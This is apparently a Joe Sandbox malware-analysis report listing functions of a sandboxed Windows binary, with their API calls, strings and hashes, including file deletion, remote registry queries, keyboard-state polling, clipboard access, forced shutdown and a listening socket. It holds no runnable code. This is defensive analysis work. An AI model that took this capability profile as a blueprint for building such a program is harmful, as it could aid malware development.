Part of subcall function 004472CB: GetFileAttributesW.KERNEL32(?,00446019), ref: 004472CC

_wcscat.LIBCMT ref: 00446441
__wsplitpath.LIBCMT ref: 0044645F
FindFirstFileW.KERNEL32(?,?), ref: 00446474
_wcscpy.LIBCMT ref: 004464A3
_wcscat.LIBCMT ref: 004464B8
_wcscat.LIBCMT ref: 004464CA
DeleteFileW.KERNEL32(?), ref: 004464DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 004464EB
FindClose.KERNEL32(00000000), ref: 00446506

Strings

\*.*, xrefs: 0044643B

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 207bf40969deb6b3d3afc2ff0a38490a33ffcbdb27faad35d926c948b6f8fdd0
Instruction ID: 73c7c28cc2d4d292303f02bb6a0fa5fbbca2d385feff7c8596e80d02910825b5
Opcode Fuzzy Hash: 207bf40969deb6b3d3afc2ff0a38490a33ffcbdb27faad35d926c948b6f8fdd0
Instruction Fuzzy Hash: 2231A2B2408384AAD721EFA498899DFB7DCAF56314F40092FF5D9C3142EA39D509876B

Function 004631BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046328E

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0046332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004633C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00463604
RegCloseKey.ADVAPI32(00000000), ref: 00463611

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: a539c27ee0bcb825059e141fc065cd09d999b375c9616f6f869982f7ad6543de
Instruction ID: dd98911054ea73e03f9d7df8a9ed958b0bc855eff2a36a34133799616501a85a
Opcode Fuzzy Hash: a539c27ee0bcb825059e141fc065cd09d999b375c9616f6f869982f7ad6543de
Instruction Fuzzy Hash: 29E15D71604200AFCB15DF29C991D2BBBE8EF89714F04896EF84AD72A1DB34ED05CB56

Function 00442B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00442B5F
GetAsyncKeyState.USER32(000000A0), ref: 00442BE0
GetKeyState.USER32(000000A0), ref: 00442BFB
GetAsyncKeyState.USER32(000000A1), ref: 00442C15
GetKeyState.USER32(000000A1), ref: 00442C2A
GetAsyncKeyState.USER32(00000011), ref: 00442C42
GetKeyState.USER32(00000011), ref: 00442C54
GetAsyncKeyState.USER32(00000012), ref: 00442C6C
GetKeyState.USER32(00000012), ref: 00442C7E
GetAsyncKeyState.USER32(0000005B), ref: 00442C96
GetKeyState.USER32(0000005B), ref: 00442CA8

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 629986fe9d90edc1b041164729a41c8d55ba068e98bacfd23210ab532d53a138
Instruction ID: 98e4a09438c2f24bdc0efa4923423c0104262d1b5743e155bd91d11c533266cc
Opcode Fuzzy Hash: 629986fe9d90edc1b041164729a41c8d55ba068e98bacfd23210ab532d53a138
Instruction Fuzzy Hash: 2141D5309047C96DFF309B608A443ABBFA0AB11354F84445FE9C6563C2DBDC9AC4C7AA

Function 00456D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00456D2E
EmptyClipboard.USER32 ref: 00456D34
GlobalAlloc.KERNEL32(00000002,?), ref: 00456D49
CloseClipboard.USER32 ref: 00456DE8

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: f37096166a4371ff03842f42e2ef56189ff75b6b6a6dbb0ea91bd807c9aff62a
Instruction ID: 0eb664db9bf6f2b7b87e2a178079bdaabe52376ddd736b46ec2ccd53d521ae62
Opcode Fuzzy Hash: f37096166a4371ff03842f42e2ef56189ff75b6b6a6dbb0ea91bd807c9aff62a
Instruction Fuzzy Hash: 4A219C317011149FDB00AF25DC49B6E77A8EF04711F05882EF90ADB2A2EB78EC558B9D

Function 0045C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00439ABF: CLSIDFromProgID.OLE32 ref: 00439ADC
Part of subcall function 00439ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00439AF7
Part of subcall function 00439ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00439B05
Part of subcall function 00439ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00439B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0045C235
_memset.LIBCMT ref: 0045C242
_memset.LIBCMT ref: 0045C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0045C38C
CoTaskMemFree.OLE32(?), ref: 0045C397

Strings

NULL Pointer assignment, xrefs: 0045C3E5

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: ff54f6335ce909c2fa6b6827016a1c9ff4870014f764a5539af47b585deaf951
Instruction ID: 3356cdb51167e4131ddd78b1ce382775f49e2990c9d9fa9527947cf0618e9e45
Opcode Fuzzy Hash: ff54f6335ce909c2fa6b6827016a1c9ff4870014f764a5539af47b585deaf951
Instruction Fuzzy Hash: 5C912A71D00218AFDB10DF95DC81EDEBBB9AF08714F10816AF915B7282DB74AA45CFA4

Function 00470133 Relevance: 10.7, APIs: 7, Instructions: 245windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

GetSystemMetrics.USER32(0000000F), ref: 0047016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0047038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004703AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 004703D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004703FF
ShowWindow.USER32(00000003,00000000), ref: 00470421
NtdllDialogWndProc_W.USER32(?,00000005,?,?), ref: 00470440

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
String ID:
API String ID: 2922825909-0
Opcode ID: a9f192c88a830d13c6a57c004f71dec426e7d16346bc4acf5147b0ab99bb992f
Instruction ID: 173c988fa6835b5105b4736bd6ec62156792104ef1851415c511a9b98474d389
Opcode Fuzzy Hash: a9f192c88a830d13c6a57c004f71dec426e7d16346bc4acf5147b0ab99bb992f
Instruction Fuzzy Hash: 87A1AF35601616EBDB18CF68C9857FEBBB1BF04700F04C16AEC58AB291D778AD61CB94

Function 004479D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 0043B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0043B180
Part of subcall function 0043B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0043B1AD
Part of subcall function 0043B134: GetLastError.KERNEL32 ref: 0043B1BA

ExitWindowsEx.USER32(?,00000000), ref: 00447A0F

Strings

@, xrefs: 00447A02
, xrefs: 004479FD
SeShutdownPrivilege, xrefs: 004479DD

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 150bf5bed513d1e5835323409ad14a908b70762b92def566276f4d62423935ad
Instruction ID: b76ccdbae1f18d17e3ead188a27b602ad99dccb6f3d18fa98a9ade3249578edf
Opcode Fuzzy Hash: 150bf5bed513d1e5835323409ad14a908b70762b92def566276f4d62423935ad
Instruction Fuzzy Hash: 3901FC716592116BF7282664DC4BBBF735CD704345F24082BF943B21C2DB6C5E0282BE

Function 00458C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00458CA8
WSAGetLastError.WSOCK32(00000000), ref: 00458CB7
bind.WSOCK32(00000000,?,00000010), ref: 00458CD3
listen.WSOCK32(00000000,00000005), ref: 00458CE2
WSAGetLastError.WSOCK32(00000000), ref: 00458CFC
closesocket.WSOCK32(00000000,00000000), ref: 00458D10

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 3aef0437483132550f173dc779258cdeee6d1cdbee113925f016bea3584900cb
Instruction ID: 9606cfcbb7039ff7302cbb9cd038319eb674cde66eaf2361e726534cdc00523c
Opcode Fuzzy Hash: 3aef0437483132550f173dc779258cdeee6d1cdbee113925f016bea3584900cb
Instruction Fuzzy Hash: 6921E131A012009FCB10EF64C985A6EB3A9AF48315F10856EED16B73D2CB38AD498B59

Function 00446532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00446554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00446564
Process32NextW.KERNEL32(00000000,0000022C), ref: 00446583
__wsplitpath.LIBCMT ref: 004465A7
_wcscat.LIBCMT ref: 004465BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 004465F9

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 2d41c09dd81c2ae839535a0934c8672d61f7edfe20a8949431cfe49a907b3b17
Instruction ID: 5a10ba3f14c39411ad8ad50115d45b01add9c21422253e8f096218853a032e33
Opcode Fuzzy Hash: 2d41c09dd81c2ae839535a0934c8672d61f7edfe20a8949431cfe49a907b3b17
Instruction Fuzzy Hash: 7B219571900218BBEB10ABA4DC88FDEB7BCAB05300F5004AAE505D3241DB759F85CB65

Function 00409B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON

Download Yara Rule

Strings

J, xrefs: 00409CF3
VUUU, xrefs: 00409E95
ERCP, xrefs: 00409C32
VUUU, xrefs: 00409ED4
VUUU, xrefs: 00409EA7
VUUU, xrefs: 0048BE14

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU$J
API String ID: 0-165364503
Opcode ID: 2ecaaabf99493e62742f510353e2728d7fc508ad6fcb74dfa7882aba823fda17
Instruction ID: 25ac9f4c21fe5ec5f371a4f52258d948e2ca307b8261b613d285611034868a53
Opcode Fuzzy Hash: 2ecaaabf99493e62742f510353e2728d7fc508ad6fcb74dfa7882aba823fda17
Instruction Fuzzy Hash: 48925D71E0021ACBDF24DF58C8807AEB7B1BB54314F1485ABE815BB381D7799D81CB9A

Function 004413CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 004413DC

Strings

,2K, xrefs: 004416B1
(, xrefs: 00441422
<2K, xrefs: 004416FA
|, xrefs: 0044140C

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: lstrlen
String ID: ($,2K$<2K$|
API String ID: 1659193697-2182472957
Opcode ID: 524c958fd482d931795d13b601762ad0f23e08667b808a05e84820537726d62a
Instruction ID: b3f271005b524aebf8f91158433a8eea4ac4193e129ed65323c4eb9f1a4cf8f1
Opcode Fuzzy Hash: 524c958fd482d931795d13b601762ad0f23e08667b808a05e84820537726d62a
Instruction Fuzzy Hash: FF323675A007059FD728DF29C4809AAB7F0FF48310B15C56EE59ADB3A2E774E981CB48

Function 0045923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0045A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0045A84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00459296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 004592B9

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 38a9d122883346d3f8cb65db6244ab408325e3e1faa11902ac3d89c5ea658cdf
Instruction ID: f31afdfd231ffbce65f4c59d6c83f29495bd5957bcfb5fbfa73d0d0b248d16ca
Opcode Fuzzy Hash: 38a9d122883346d3f8cb65db6244ab408325e3e1faa11902ac3d89c5ea658cdf
Instruction Fuzzy Hash: 8641F570600104AFDB10AB24C842E7E77EDEF08328F04445EF956A73D3DB789D418B99

Function 0044EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0044EB8A
_wcscmp.LIBCMT ref: 0044EBBA
_wcscmp.LIBCMT ref: 0044EBCF
FindNextFileW.KERNEL32(00000000,?), ref: 0044EBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0044EC0E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 7decc0964aa9a0c18d0d93d071e471d8afd33c0129de16156793592e0011829b
Instruction ID: f4d4502bd19f39e4eae8a827b2e93a7102bde83d7ab60724816fa37c5e4c86a1
Opcode Fuzzy Hash: 7decc0964aa9a0c18d0d93d071e471d8afd33c0129de16156793592e0011829b
Instruction Fuzzy Hash: 9041DF306006019FD708DF29C4D1A9AB3E4FF49324F10456EEA5A8B3A1DB39B985CB99

Function 00468111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00468160
IsWindowEnabled.USER32 ref: 0046816E
GetForegroundWindow.USER32(?,?,00000001), ref: 0046817B
IsIconic.USER32 ref: 00468189
IsZoomed.USER32 ref: 00468197

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: dbfed87c38ee92bf59b292af6f5fadc4ca6e903502444fd297db996fb690681f
Instruction ID: b914647029d33102a7cfa3aa289e3b8462c5c21d78575f5ca8fb078c54b4ff5d
Opcode Fuzzy Hash: dbfed87c38ee92bf59b292af6f5fadc4ca6e903502444fd297db996fb690681f
Instruction Fuzzy Hash: 0711E2317011146BE7212F26DC44EAF7799EF46720B04052FF849D3281EF78980386AE

Function 0041E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0041E014,74DF0AE0,0041DEF1,0049DC38,?,?), ref: 0041E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0041E03E

Strings

GetNativeSystemInfo, xrefs: 0041E038
kernel32.dll, xrefs: 0041E027

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: d4bcc8df34a69c75c0e0aef847fce7452e4d83df1b9fa05b59668c201de80aca
Instruction ID: d3a2d7f9251202634d31430f40abaa6068e993e0ea93885ba20427a44fa0b13a
Opcode Fuzzy Hash: d4bcc8df34a69c75c0e0aef847fce7452e4d83df1b9fa05b59668c201de80aca
Instruction Fuzzy Hash: 7BD05E348007229EC7215B62E9087977BD4AF04700F28482FE88192290D6F8D8808768

Function 0046F1D7 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

GetCursorPos.USER32(?), ref: 0046F211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0047E4C0,?,?,?,?,?), ref: 0046F226
GetCursorPos.USER32(?), ref: 0046F270
NtdllDialogWndProc_W.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0047E4C0,?,?,?), ref: 0046F2A6

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
String ID:
API String ID: 1423138444-0
Opcode ID: c9fa625b601cbf756392a4f299952a3100370d958edd679e47e359abe6fdd125
Instruction ID: 421acbc8388f5fa8e11c8d5781fd18043b8c951ec840c19c7752c1421d3c3654
Opcode Fuzzy Hash: c9fa625b601cbf756392a4f299952a3100370d958edd679e47e359abe6fdd125
Instruction Fuzzy Hash: 0521F238601018BFCB158F95E868EEF7BB5EF0A310F0440AAF945472A2E3399950DF95

Function 0041B55D Relevance: 6.1, APIs: 4, Instructions: 56nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

NtdllDialogWndProc_W.USER32(?,00000020,?,00000000), ref: 0041B5A5
GetClientRect.USER32(?,?), ref: 0047E69A
GetCursorPos.USER32(?), ref: 0047E6A4
ScreenToClient.USER32(?,?), ref: 0047E6AF

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
